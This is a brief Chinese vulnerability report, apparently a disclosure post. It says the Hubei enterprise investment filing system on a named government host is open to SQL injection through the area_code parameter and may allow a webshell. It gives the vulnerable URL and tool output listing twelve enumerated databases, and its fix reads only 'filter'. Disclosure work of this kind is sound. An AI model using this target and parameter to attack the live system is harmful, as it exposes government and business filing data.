湖北企业投资项目备案系统SQL注入可getshell下载

湖北企业投资项目备案系统SQL注入可getshell，包括湖北省企业投资的备案信息，影响较严重，不法分子可通过此漏洞获取到项目备案信息。

http://www.hbinvest.gov.cn/prws/index2.aspx?area_code=420600&str= area_code=420600 存在sql注入漏洞

available databases [12]:

[*] master

[*] model

[*] msdb

[*] Northwind

[*] PRS_Common

[*] prws

[*] pubs

[*] RightDB

[*] RPL

[*] tempdb

[*] test

[*] WorkFlow

修复方案：

过滤